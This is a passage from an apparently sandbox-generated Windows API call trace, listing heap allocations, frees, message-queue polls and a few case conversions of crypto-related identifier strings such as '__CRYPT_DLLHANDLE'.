(HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.811] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.811] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0075.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0075.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.812] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb448 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad60 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.813] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.813] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.813] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.813] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.813] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.814] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.814] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.814] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.815] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.815] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.815] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0075.816] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.816] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.816] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e360 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.816] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.816] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.816] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.816] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.816] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.816] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.817] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.817] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.817] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.817] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.817] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.817] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.817] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.817] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.818] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.818] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.818] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.818] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.818] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.818] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.818] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.818] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.818] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.819] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.819] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.819] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.819] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.819] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.819] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.819] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.819] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.819] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.820] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.820] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.821] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.821] WideCharToMultiByte 